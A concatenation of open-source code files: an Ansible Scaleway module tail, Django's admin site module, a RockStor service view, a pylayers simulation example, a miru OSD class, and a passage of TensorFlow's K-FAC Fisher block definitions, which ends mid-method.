Scaleway, ScalewayException, scaleway_argument_spec, SCALEWAY_LOCATION)
class ScalewayImageFacts(Scaleway):
def __init__(self, module):
super(ScalewayImageFacts, self).__init__(module)
self.name = 'images'
region = module.params["region"]
self.module.params['api_url'] = SCALEWAY_LOCATION[region]["api_endpoint"]
def main():
argument_spec = scaleway_argument_spec()
argument_spec.update(dict(
region=dict(required=True, choices=SCALEWAY_LOCATION.keys()),
))
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
try:
module.exit_json(
ansible_facts={'scaleway_image_facts': ScalewayImageFacts(module).get_resources()}
)
except ScalewayException as exc:
module.fail_json(msg=exc.message)
if __name__ == '__main__':
main()
| gpl-3.0 |
dsaraujo/circulante | django/contrib/admin/sites.py | 80 | 17398 | import re
from django import http, template
from django.contrib.admin import ModelAdmin, actions
from django.contrib.admin.forms import AdminAuthenticationForm
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.contrib.contenttypes import views as contenttype_views
from django.views.decorators.csrf import csrf_protect
from django.db.models.base import ModelBase
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.shortcuts import render_to_response
from django.utils.functional import update_wrapper
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.views.decorators.cache import never_cache
from django.conf import settings
LOGIN_FORM_KEY = 'this_is_the_login_form'
class AlreadyRegistered(Exception):
pass
class NotRegistered(Exception):
pass
class AdminSite(object):
"""
An AdminSite object encapsulates an instance of the Django admin application, ready
to be hooked in to your URLconf. Models are registered with the AdminSite using the
register() method, and the get_urls() method can then be used to access Django view
functions that present a full admin interface for the collection of registered
models.
"""
login_form = None
index_template = None
app_index_template = None
login_template = None
logout_template = None
password_change_template = None
password_change_done_template = None
def __init__(self, name=None, app_name='admin'):
self._registry = {} # model_class class -> admin_class instance
self.root_path = None
if name is None:
self.name = 'admin'
else:
self.name = name
self.app_name = app_name
self._actions = {'delete_selected': actions.delete_selected}
self._global_actions = self._actions.copy()
def register(self, model_or_iterable, admin_class=None, **options):
"""
Registers the given model(s) with the given admin class.
The model(s) should be Model classes, not instances.
If an admin class isn't given, it will use ModelAdmin (the default
admin options). If keyword arguments are given -- e.g., list_display --
they'll be applied as options to the admin class.
If a model is already registered, this will raise AlreadyRegistered.
If a model is abstract, this will raise ImproperlyConfigured.
"""
if not admin_class:
admin_class = ModelAdmin
# Don't import the humongous validation code unless required
if admin_class and settings.DEBUG:
from django.contrib.admin.validation import validate
else:
validate = lambda model, adminclass: None
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model._meta.abstract:
raise ImproperlyConfigured('The model %s is abstract, so it '
'cannot be registered with admin.' % model.__name__)
if model in self._registry:
raise AlreadyRegistered('The model %s is already registered' % model.__name__)
# If we got **options then dynamically construct a subclass of
# admin_class with those **options.
if options:
# For reasons I don't quite understand, without a __module__
# the created class appears to "live" in the wrong place,
# which causes issues later on.
options['__module__'] = __name__
admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
# Validate (which might be a no-op)
validate(admin_class, model)
# Instantiate the admin class to save in the registry
self._registry[model] = admin_class(model, self)
def unregister(self, model_or_iterable):
"""
Unregisters the given model(s).
If a model isn't already registered, this will raise NotRegistered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotRegistered('The model %s is not registered' % model.__name__)
del self._registry[model]
def add_action(self, action, name=None):
"""
Register an action to be available globally.
"""
name = name or action.__name__
self._actions[name] = action
self._global_actions[name] = action
def disable_action(self, name):
"""
Disable a globally-registered action. Raises KeyError for invalid names.
"""
del self._actions[name]
def get_action(self, name):
"""
        Explicitly get a registered global action whether it's enabled or
        not. Raises KeyError for invalid names.
"""
return self._global_actions[name]
@property
def actions(self):
"""
Get all the enabled actions as an iterable of (name, func).
"""
return self._actions.iteritems()
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
def check_dependencies(self):
"""
Check that all things needed to run the admin have been correctly installed.
The default implementation checks that LogEntry, ContentType and the
auth context processor are installed.
"""
from django.contrib.admin.models import LogEntry
from django.contrib.contenttypes.models import ContentType
if not LogEntry._meta.installed:
raise ImproperlyConfigured("Put 'django.contrib.admin' in your "
"INSTALLED_APPS setting in order to use the admin application.")
if not ContentType._meta.installed:
raise ImproperlyConfigured("Put 'django.contrib.contenttypes' in "
"your INSTALLED_APPS setting in order to use the admin application.")
if not ('django.contrib.auth.context_processors.auth' in settings.TEMPLATE_CONTEXT_PROCESSORS or
'django.core.context_processors.auth' in settings.TEMPLATE_CONTEXT_PROCESSORS):
raise ImproperlyConfigured("Put 'django.contrib.auth.context_processors.auth' "
"in your TEMPLATE_CONTEXT_PROCESSORS setting in order to use the admin application.")
def admin_view(self, view, cacheable=False):
"""
Decorator to create an admin view attached to this ``AdminSite``. This
wraps the view and provides permission checking by calling
``self.has_permission``.
You'll want to use this from within ``AdminSite.get_urls()``:
class MyAdminSite(AdminSite):
def get_urls(self):
from django.conf.urls.defaults import patterns, url
urls = super(MyAdminSite, self).get_urls()
urls += patterns('',
url(r'^my_view/$', self.admin_view(some_view))
)
return urls
By default, admin_views are marked non-cacheable using the
``never_cache`` decorator. If the view can be safely cached, set
cacheable=True.
"""
def inner(request, *args, **kwargs):
if not self.has_permission(request):
return self.login(request)
return view(request, *args, **kwargs)
if not cacheable:
inner = never_cache(inner)
# We add csrf_protect here so this function can be used as a utility
# function for any view, without having to repeat 'csrf_protect'.
if not getattr(view, 'csrf_exempt', False):
inner = csrf_protect(inner)
return update_wrapper(inner, view)
def get_urls(self):
from django.conf.urls.defaults import patterns, url, include
if settings.DEBUG:
self.check_dependencies()
def wrap(view, cacheable=False):
def wrapper(*args, **kwargs):
return self.admin_view(view, cacheable)(*args, **kwargs)
return update_wrapper(wrapper, view)
# Admin-site-wide views.
urlpatterns = patterns('',
url(r'^$',
wrap(self.index),
name='index'),
url(r'^logout/$',
wrap(self.logout),
name='logout'),
url(r'^password_change/$',
wrap(self.password_change, cacheable=True),
name='password_change'),
url(r'^password_change/done/$',
wrap(self.password_change_done, cacheable=True),
name='password_change_done'),
url(r'^jsi18n/$',
wrap(self.i18n_javascript, cacheable=True),
name='jsi18n'),
url(r'^r/(?P<content_type_id>[a-z\d]+)/(?P<object_id>.+)/$',
wrap(contenttype_views.shortcut)),
url(r'^(?P<app_label>\w+)/$',
wrap(self.app_index),
name='app_list')
)
# Add in each model's views.
for model, model_admin in self._registry.iteritems():
urlpatterns += patterns('',
url(r'^%s/%s/' % (model._meta.app_label, model._meta.module_name),
include(model_admin.urls))
)
return urlpatterns
@property
def urls(self):
return self.get_urls(), self.app_name, self.name
def password_change(self, request):
"""
Handles the "change password" task -- both form display and validation.
"""
from django.contrib.auth.views import password_change
if self.root_path is not None:
url = '%spassword_change/done/' % self.root_path
else:
url = reverse('admin:password_change_done', current_app=self.name)
defaults = {
'current_app': self.name,
'post_change_redirect': url
}
if self.password_change_template is not None:
defaults['template_name'] = self.password_change_template
return password_change(request, **defaults)
def password_change_done(self, request, extra_context=None):
"""
Displays the "success" page after a password change.
"""
from django.contrib.auth.views import password_change_done
defaults = {
'current_app': self.name,
'extra_context': extra_context or {},
}
if self.password_change_done_template is not None:
defaults['template_name'] = self.password_change_done_template
return password_change_done(request, **defaults)
def i18n_javascript(self, request):
"""
Displays the i18n JavaScript that the Django admin requires.
This takes into account the USE_I18N setting. If it's set to False, the
generated JavaScript will be leaner and faster.
"""
if settings.USE_I18N:
from django.views.i18n import javascript_catalog
else:
from django.views.i18n import null_javascript_catalog as javascript_catalog
return javascript_catalog(request, packages=['django.conf', 'django.contrib.admin'])
@never_cache
def logout(self, request, extra_context=None):
"""
Logs out the user for the given HttpRequest.
This should *not* assume the user is already logged in.
"""
from django.contrib.auth.views import logout
defaults = {
'current_app': self.name,
'extra_context': extra_context or {},
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
return logout(request, **defaults)
@never_cache
def login(self, request, extra_context=None):
"""
Displays the login form for the given HttpRequest.
"""
from django.contrib.auth.views import login
context = {
'title': _('Log in'),
'root_path': self.root_path,
'app_path': request.get_full_path(),
REDIRECT_FIELD_NAME: request.get_full_path(),
}
context.update(extra_context or {})
defaults = {
'extra_context': context,
'current_app': self.name,
'authentication_form': self.login_form or AdminAuthenticationForm,
'template_name': self.login_template or 'admin/login.html',
}
return login(request, **defaults)
@never_cache
def index(self, request, extra_context=None):
"""
Displays the main admin index page, which lists all of the installed
apps that have been registered in this site.
"""
app_dict = {}
user = request.user
for model, model_admin in self._registry.items():
app_label = model._meta.app_label
has_module_perms = user.has_module_perms(app_label)
if has_module_perms:
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True in perms.values():
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'admin_url': mark_safe('%s/%s/' % (app_label, model.__name__.lower())),
'perms': perms,
}
if app_label in app_dict:
app_dict[app_label]['models'].append(model_dict)
else:
app_dict[app_label] = {
'name': app_label.title(),
'app_url': app_label + '/',
'has_module_perms': has_module_perms,
'models': [model_dict],
}
# Sort the apps alphabetically.
app_list = app_dict.values()
app_list.sort(key=lambda x: x['name'])
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
context = {
'title': _('Site administration'),
'app_list': app_list,
'root_path': self.root_path,
}
context.update(extra_context or {})
context_instance = template.RequestContext(request, current_app=self.name)
return render_to_response(self.index_template or 'admin/index.html', context,
context_instance=context_instance
)
def app_index(self, request, app_label, extra_context=None):
user = request.user
has_module_perms = user.has_module_perms(app_label)
app_dict = {}
for model, model_admin in self._registry.items():
if app_label == model._meta.app_label:
if has_module_perms:
perms = model_admin.get_model_perms(request)
# Check whether user has any perm for this module.
# If so, add the module to the model_list.
if True in perms.values():
model_dict = {
'name': capfirst(model._meta.verbose_name_plural),
'admin_url': '%s/' % model.__name__.lower(),
'perms': perms,
}
if app_dict:
                            app_dict['models'].append(model_dict)
else:
# First time around, now that we know there's
# something to display, add in the necessary meta
# information.
app_dict = {
'name': app_label.title(),
'app_url': '',
'has_module_perms': has_module_perms,
'models': [model_dict],
}
if not app_dict:
raise http.Http404('The requested admin page does not exist.')
# Sort the models alphabetically within each app.
app_dict['models'].sort(key=lambda x: x['name'])
context = {
'title': _('%s administration') % capfirst(app_label),
'app_list': [app_dict],
'root_path': self.root_path,
}
context.update(extra_context or {})
context_instance = template.RequestContext(request, current_app=self.name)
return render_to_response(self.app_index_template or ('admin/%s/app_index.html' % app_label,
'admin/app_index.html'), context,
context_instance=context_instance
)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin site.
site = AdminSite()
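# Illustrative usage sketch (comment only, not part of this module): registering
# a model with the default site, per the register() docstring above. `BlogPost`
# is a hypothetical model class.
#
#     from django.contrib import admin
#     admin.site.register(BlogPost, list_display=('title', 'created'))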
| bsd-3-clause |
priyaganti/rockstor-core | src/rockstor/smart_manager/views/sm_service.py | 2 | 2032 | """
Copyright (c) 2012-2014 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from rest_framework.response import Response
from storageadmin.util import handle_exception
from system.services import superctl
from django.db import transaction
from base_service import BaseServiceDetailView
from smart_manager.models import Service
import logging
logger = logging.getLogger(__name__)
class ServiceMonitorView(BaseServiceDetailView):
@transaction.atomic
def post(self, request, command):
"""
execute a command on the service
"""
service = Service.objects.get(name='service-monitor')
if (command == 'config'):
# nothing to really configure atm. just save the model
try:
config = request.data['config']
self._save_config(service, config)
except Exception as e:
logger.exception(e)
e_msg = ('Service Monitor could not be configured. Try again')
handle_exception(Exception(e_msg), request)
else:
try:
superctl(service.name, command)
except Exception as e:
logger.exception(e)
e_msg = ('Failed to %s Service Monitor due to a system '
'error.' % command)
handle_exception(Exception(e_msg), request)
return Response()
| gpl-3.0 |
pylayers/pylayers | pylayers/antprop/examples/ex_tud2.py | 3 | 4822 | from pylayers.simul.simulem import *
from pylayers.antprop.raysc import *
from pylayers.antprop.channel import *
import pylayers.util.pyutil as pyu
import pylayers.signal.bsignal as bs
import time
# create a Simul object
def plotray(r):
plt.ion()
plt.close('all')
fig=plt.figure('Cpp')
f,a=C.Cpp.plot(fig=fig,iy=np.array(([r])))
    f,a=Cn.Cpp.plot(fig=fig,iy=np.array(([r])))
a[0].legend(('Fried','new'))
fig2=plt.figure('Ctt')
f,a=C.Ctt.plot(fig=fig2,iy=np.array(([r])))
    f,a=Cn.Ctt.plot(fig=fig2,iy=np.array(([r])))
a[0].legend(('Fried','new'))
Gt.info(r)
plt.show()
###################################
# Simulation creation
#
#################################
S = Simul()
# loading a layout
filestr = 'TA-Office'
S.layout(filestr+'.ini','matDB.ini','slabDB.ini')
try:
S.L.dumpr()
except:
S.L.build()
S.L.dumpw()
S.tx = RadioNode(typ='tx')
S.tx.point([1.2,1,1.4])
# TX / RX
itx=1
irx=1
S.rx = RadioNode(typ='rx')
S.rx.point([8,-1.2,1.5])
S.save()
S.run(itx,irx)
###################################
# New load function
# load pulray tud file
#
#################################
Gt=GrRayTud()
Gt.load(S.dtud[itx][irx],S.dtang[itx][irx],S.drang[itx][irx],S.slab)
a=time.time()
print 'evaluation of all rays & interactions'
Gt.eval()
b=time.time()
#print 'memory size occupied by Interaction matrix = ',Gt.I.I.nbytes/1e6,'MB'
#print 'memory size occupied by Ctilde matrix = ',Gt.Ctilde.nbytes/1e6,'MB'
print 'evaluation in ',(b-a) ,'seconds'
C=Ctilde()
C.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
freq=Gt.I.f
nfreq=Gt.I.nf
nray=np.array(([Gt.nray]))
Cr=np.swapaxes(Gt.Ctilde,1,0)
#Cr=Gt.Ctilde.reshape(nray, nfreq,2,2)
#Cr=np.transpose(Gt.Ctilde,(1,0,2,3))
c11 = Cr[:,:,0,0]
c12 = Cr[:,:,0,1]
c21 = Cr[:,:,1,0]
c22 = Cr[:,:,1,1]
Cn=Ctilde()
Cn.Cpp = bs.FUsignal(freq, c11)
Cn.Ctp = bs.FUsignal(freq, c12)
Cn.Cpt = bs.FUsignal(freq, c21)
Cn.Ctt = bs.FUsignal(freq, c22)
Cn.nfreq = Gt.I.nf
Cn.nray = Gt.nray
Cn.tauk=Gt.delays
r=0
plotray(r)
### RECIPROCITY TEST
#S2 = Simul()
## loading a layout
#filestr = 'defstr'
#S2.layout(filestr+'.str','matDB.ini','slabDB.ini')
#try:
# S2.L.dumpr()
#except:
# S2.L.build()
# S2.L.dumpw()
#S2.rx = RadioNode(typ='rx')
#S2.rx.point([1.2,1,1.4])
## TX / RX
#itx=1
#irx=1
#S2.tx = RadioNode(typ='tx')
#S2.tx.point([8,-1.2,1.5])
#S2.save()
#S2.run(itx,irx)
#Gt2=GrRayTud()
#Gt2.load(S2.dtud[itx][irx],S2.dtang[itx][irx],S2.drang[itx][irx],S.slab)
#a=time.time()
#print 'evaluation of all rays & interactions'
#Gt2.eval()
#b=time.time()
#print 'memory size occupied by Interaction matrix = ',Gt.I.I.nbytes/1e6,'MB'
#print 'memory size occupied by Ctilde matrix = ',Gt.Ctilde.nbytes/1e6,'MB'
#print 'evaluation in ',(b-a) ,'seconds'
#C2=Ctilde()
#C2.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
#freq=Gt2.I.f
#nfreq=Gt2.I.nf
#nray=np.array(([Gt2.nray]))
#Cr2=Gt2.Ctilde.reshape(nray, nfreq,2,2)
#Cr2=np.transpose(Gt2.Ctilde,(1,0,2,3))
#c11_ = Cr2[:,:,0,0]
#c12_ = Cr2[:,:,0,1]
#c21_ = Cr2[:,:,1,0]
#c22_ = Cr2[:,:,1,1]
#Cn2=Ctilde()
#Cn2.Ctt = bs.FUsignal(freq, c11_)
#Cn2.Ctp = bs.FUsignal(freq, c12_)
#Cn2.Cpt = bs.FUsignal(freq, c21_)
#Cn2.Cpp = bs.FUsignal(freq, c22_)
#Cn2.nfreq = Gt2.I.nf
#Cn2.nray = Gt2.nray
#Cn2.tauk=Gt2.delays
##plt.ion()
#plt.figure('2Cpp - Fried')
#C.Cpp.plot()
#plt.figure('2Cpp - new')
#Cn2.Cpp.plot()
#plt.figure('2Ctt - Fried')
#C.Ctt.plot()
#plt.figure('2Ctt - new')
#Cn2.Ctt.plot()
############################################################################
#plt.figure('Ctp - Fried')
#C.Ctp.plot()
#plt.figure('Ctp - new')
#C2.Ctp.plot()
#plt.figure('Cpt - Fried')
#C.Cpt.plot()
#plt.figure('Cpt - new')
#C2.Cpt.plot()
#raw_input('press any key to close figure')
#plt.close('all')
#S2 = Simul()
## loading a layout
#filestr = 'defstr'
#S2.layout(filestr+'.str','matDB.ini','slabDB.ini')
#try:
# S2.L.dumpr()
#except:
# S2.L.build()
# S2.L.dumpw()
#S2.rx = RadioNode(typ='rx')
#S2.rx.point([1.2,1,1.4])
## TX / RX
#itx=1
#irx=1
#S2.tx = RadioNode(typ='tx')
#S2.tx.point([8,-1.2,1.5])
#S2.save()
#S2.run(itx,irx)
#Gt2=GrRayTud()
#Gt2.load(S2.dtud[itx][irx],S2.dtang[itx][irx],S2.drang[itx][irx],S2.sl)
## dictionnary of length of interactions
## keys are the number of interactions.
#k=Gt2.dli.keys()
## Gt.dli is a dictionnary of dictionnary
#Gt2.dli[k[0]].keys()
#print 'evaluation of all rays & interactions'
#Gt2.eval()
#C2=Ctilde()
#C2.load(pyu.getlong(S2.dfield[itx][irx],pstruc['DIRTRA']))
#CC = Gt.Ctilde
#C=Ctilde()
#C.load(pyu.getlong(S.dfield[itx][irx],pstruc['DIRTRA']))
#Gt.I.eval()
#rt=Gt.rayTud[1]
#thetas=Gt.get_thetas()
#mat=Gt.get_mat()
#B=rt.inter[0]
#Be=B.eval()
#T=rt.inter[3]
#Te=T.eval()
| mit |
Knio/miru | miru/osd2.py | 1 | 2435 | # Copyright (c) 2008 Drew Smathers.
# See LICENSE for details
"""On screen display
"""
from UserList import UserList
from pyglet import gl
from miru import imiru
from miru import core
from zope.interface import implements
class OSD(object):
"""The OSD is a container for objects that can be rendered in 2D
to overlay the 3D sceen. To add objects:
osd = OSD(window)
osd.add_object(thingy)
The OSD object's on_resize method should be pushed on the event
stack for handling resize events:
event.push_handlers('on_resize', osd.on_resize)
"""
implements(imiru.IOSDRenderStage)
context = None
def __init__(self):
self.objects = []
self.clickable = []
self.widgets = self.clickable
def _set_2d(self, near, far):
w = self.context.window
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glPushMatrix()
gl.glLoadIdentity()
gl.glOrtho(0, w.width, 0, w.height, near, far)
gl.glMatrixMode(gl.GL_MODELVIEW)
gl.glPushMatrix()
gl.glLoadIdentity()
def _unset_2d(self):
gl.glPopMatrix()
gl.glMatrixMode(gl.GL_PROJECTION)
gl.glPopMatrix()
gl.glMatrixMode(gl.GL_MODELVIEW)
def render(self):
"""Draw contained objects.
"""
if not self.objects:
return
r = 32
self._set_2d(0, r*4)
gl.glPushAttrib(gl.GL_ENABLE_BIT)
gl.glEnable(gl.GL_BLEND)
gl.glDisable(gl.GL_DEPTH_TEST)
gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)
import miru.graphics
for v in self.objects:
v.draw()
#print '-- %r' % v
#print '\n'.join([ str(t) for t in miru.graphics.TextureTool.current_parameters()])
gl.glColor4f(1,1,1,1)
gl.glPopAttrib()
self._unset_2d()
def pop(self, index=-1):
obj = self.objects.pop(index)
if obj in self.clickable:
self.clickable.remove(obj)
return obj
def __iter__(self):
return iter(self.objects)
def add_object(self, obj):
self.objects.append(obj)
if isinstance(obj, core.Object) and imiru.IDraggable.providedBy(obj.drawable):
self.clickable.append(obj)
def remove_object(self, obj):
self.objects.remove(obj)
if obj in self.clickable:
self.clickable.remove(obj)
| mit |
JingJunYin/tensorflow | tensorflow/contrib/kfac/python/ops/fisher_blocks.py | 9 | 36853 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""FisherBlock definitions.
This library contains classes for estimating blocks in a model's Fisher
Information matrix. Suppose one has a model that parameterizes a posterior
distribution over 'y' given 'x' with parameters 'params', p(y | x, params). Its
Fisher Information matrix is given by,
F(params) = E[ v(x, y, params) v(x, y, params)^T ]
where,
v(x, y, params) = (d / d params) log p(y | x, params)
and the expectation is taken with respect to the data's distribution for 'x' and
the model's posterior distribution for 'y',
x ~ p(x)
y ~ p(y | x, params)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import enum # pylint: disable=g-bad-import-order
import six
from tensorflow.contrib.kfac.python.ops import fisher_factors
from tensorflow.contrib.kfac.python.ops import utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# For blocks corresponding to convolutional layers, or any type of block where
# the parameters can be thought of as being replicated in time or space,
# we want to adjust the scale of the damping by
# damping /= num_replications ** NORMALIZE_DAMPING_POWER
NORMALIZE_DAMPING_POWER = 1.0
# Methods for adjusting damping for FisherBlocks. See
# _compute_pi_adjusted_damping() for details.
PI_OFF_NAME = "off"
PI_TRACENORM_NAME = "tracenorm"
PI_TYPE = PI_TRACENORM_NAME
def set_global_constants(normalize_damping_power=None, pi_type=None):
"""Sets various global constants used by the classes in this module."""
global NORMALIZE_DAMPING_POWER
global PI_TYPE
if normalize_damping_power is not None:
NORMALIZE_DAMPING_POWER = normalize_damping_power
if pi_type is not None:
PI_TYPE = pi_type
def _compute_pi_tracenorm(left_cov, right_cov):
"""Computes the scalar constant pi for Tikhonov regularization/damping.
pi = sqrt( (trace(A) / dim(A)) / (trace(B) / dim(B)) )
See section 6.3 of https://arxiv.org/pdf/1503.05671.pdf for details.
Args:
left_cov: The left Kronecker factor "covariance".
right_cov: The right Kronecker factor "covariance".
Returns:
The computed scalar constant pi for these Kronecker Factors (as a Tensor).
"""
# Instead of dividing by the dim of the norm, we multiply by the dim of the
# other norm. This works out the same in the ratio.
left_norm = math_ops.trace(left_cov) * right_cov.shape.as_list()[0]
right_norm = math_ops.trace(right_cov) * left_cov.shape.as_list()[0]
return math_ops.sqrt(left_norm / right_norm)
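# Illustrative check of the formula above (comment only, not executed): with
# left_cov = diag(2., 2.) and right_cov = [[8.]], trace(A)/dim(A) = 2 and
# trace(B)/dim(B) = 8, so pi = sqrt(2 / 8) = 0.5.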
def _compute_pi_adjusted_damping(left_cov, right_cov, damping):
if PI_TYPE == PI_TRACENORM_NAME:
pi = _compute_pi_tracenorm(left_cov, right_cov)
return (damping * pi, damping / pi)
elif PI_TYPE == PI_OFF_NAME:
return (damping, damping)
@six.add_metaclass(abc.ABCMeta)
class FisherBlock(object):
"""Abstract base class for objects modeling approximate Fisher matrix blocks.
Subclasses must implement multiply_inverse(), instantiate_factors(), and
tensors_to_compute_grads() methods.
"""
def __init__(self, layer_collection):
self._layer_collection = layer_collection
@abc.abstractmethod
def instantiate_factors(self, grads_list, damping):
"""Creates and registers the component factors of this Fisher block.
Args:
grads_list: A list gradients (each a Tensor or tuple of Tensors) with
respect to the tensors returned by tensors_to_compute_grads() that
are to be used to estimate the block.
damping: The damping factor (float or Tensor).
"""
pass
@abc.abstractmethod
def multiply_inverse(self, vector):
"""Multiplies the vector by the (damped) inverse of the block.
Args:
vector: The vector (a Tensor or tuple of Tensors) to be multiplied.
Returns:
The vector left-multiplied by the (damped) inverse of the block.
"""
pass
@abc.abstractmethod
def multiply(self, vector):
"""Multiplies the vector by the (damped) block.
Args:
vector: The vector (a Tensor or tuple of Tensors) to be multiplied.
Returns:
The vector left-multiplied by the (damped) block.
"""
pass
@abc.abstractmethod
def tensors_to_compute_grads(self):
"""Returns the Tensor(s) with respect to which this FisherBlock needs grads.
"""
pass
@abc.abstractproperty
def num_registered_minibatches(self):
"""Number of minibatches registered for this FisherBlock.
Typically equal to the number of towers in a multi-tower setup.
"""
pass
class FullFB(FisherBlock):
"""FisherBlock using a full matrix estimate (no approximations).
FullFB uses a full matrix estimate (no approximations), and should only ever
be used for very low dimensional parameters.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self, layer_collection, params):
"""Creates a FullFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters of this layer (Tensor or tuple of Tensors).
"""
self._batch_sizes = []
self._params = params
super(FullFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullFactor, (grads_list, self._batch_size))
self._factor.register_damped_inverse(damping)
def multiply_inverse(self, vector):
inverse = self._factor.get_damped_inverse(self._damping)
out_flat = math_ops.matmul(inverse, utils.tensors_to_column(vector))
return utils.column_to_tensors(vector, out_flat)
def multiply(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = (
math_ops.matmul(self._factor.get_cov(), vector_flat) +
self._damping * vector_flat)
return utils.column_to_tensors(vector, out_flat)
def full_fisher_block(self):
"""Explicitly constructs the full Fisher block."""
return self._factor.get_cov()
def tensors_to_compute_grads(self):
return self._params
def register_additional_minibatch(self, batch_size):
"""Register an additional minibatch.
Args:
batch_size: The batch size, used in the covariance estimator.
"""
self._batch_sizes.append(batch_size)
@property
def num_registered_minibatches(self):
return len(self._batch_sizes)
@property
def _batch_size(self):
return math_ops.reduce_sum(self._batch_sizes)
class NaiveDiagonalFB(FisherBlock):
"""FisherBlock using a diagonal matrix approximation.
This type of approximation is generically applicable but quite primitive.
Note that this uses the naive "square the sum estimator", and so is applicable
to any type of parameter in principle, but has very high variance.
"""
def __init__(self, layer_collection, params):
"""Creates a NaiveDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
params: The parameters of this layer (Tensor or tuple of Tensors).
"""
self._params = params
self._batch_sizes = []
super(NaiveDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.NaiveDiagonalFactor, (grads_list, self._batch_size))
def multiply_inverse(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = vector_flat / (self._factor.get_cov() + self._damping)
return utils.column_to_tensors(vector, out_flat)
def multiply(self, vector):
vector_flat = utils.tensors_to_column(vector)
out_flat = vector_flat * (self._factor.get_cov() + self._damping)
return utils.column_to_tensors(vector, out_flat)
def full_fisher_block(self):
return array_ops.diag(array_ops.reshape(self._factor.get_cov(), (-1,)))
def tensors_to_compute_grads(self):
return self._params
def register_additional_minibatch(self, batch_size):
"""Register an additional minibatch.
Args:
batch_size: The batch size, used in the covariance estimator.
"""
self._batch_sizes.append(batch_size)
@property
def num_registered_minibatches(self):
return len(self._batch_sizes)
@property
def _batch_size(self):
return math_ops.reduce_sum(self._batch_sizes)
class FullyConnectedDiagonalFB(FisherBlock):
"""FisherBlock for fully-connected (dense) layers using a diagonal approx.
Estimates the Fisher Information matrix's diagonal entries for a fully
connected layer. Unlike NaiveDiagonalFB this uses the low-variance "sum of
squares" estimator.
Let 'params' be a vector parameterizing a model and 'i' an arbitrary index
into it. We are interested in Fisher(params)[i, i]. This is,
Fisher(params)[i, i] = E[ v(x, y, params) v(x, y, params)^T ][i, i]
= E[ v(x, y, params)[i] ^ 2 ]
  Consider a fully connected layer in this model with (unshared) weight matrix
'w'. For an example 'x' that produces layer inputs 'a' and output
preactivations 's',
v(x, y, w) = vec( a (d loss / d s)^T )
This FisherBlock tracks Fisher(params)[i, i] for all indices 'i' corresponding
to the layer's parameters 'w'.
"""
def __init__(self, layer_collection, has_bias=False):
"""Creates a FullyConnectedDiagonalFB block.
Args:
layer_collection: The collection of all layers in the K-FAC approximate
Fisher information matrix to which this FisherBlock belongs.
has_bias: Whether the component Kronecker factors have an additive bias.
(Default: False)
"""
self._inputs = []
self._outputs = []
self._has_bias = has_bias
super(FullyConnectedDiagonalFB, self).__init__(layer_collection)
def instantiate_factors(self, grads_list, damping):
inputs = _concat_along_batch_dim(self._inputs)
grads_list = tuple(_concat_along_batch_dim(grads) for grads in grads_list)
self._damping = damping
self._factor = self._layer_collection.make_or_get_factor(
fisher_factors.FullyConnectedDiagonalFactor,
(inputs, grads_list, self._has_bias))
def multiply_inverse(self, vector):
"""Approximate damped inverse Fisher-vector product.
Args:
vector: Tensor or 2-tuple of Tensors. if self._has_bias, Tensor of shape
[input_size, output_size] corresponding to layer's weights. If not, a
2-tuple of the former and a Tensor of shape [output_size] corresponding
to the layer's bias.
Returns:
Tensor of the same shape, corresponding to the inverse Fisher-vector
product.
"""
reshaped_vect = utils.layer_params_to_mat2d(vector)
reshaped_out = reshaped_vect / (self._factor.get_cov() + self._damping)
return utils.mat2d_to_layer_params(vector, reshaped_out)
def multiply(self, vector):
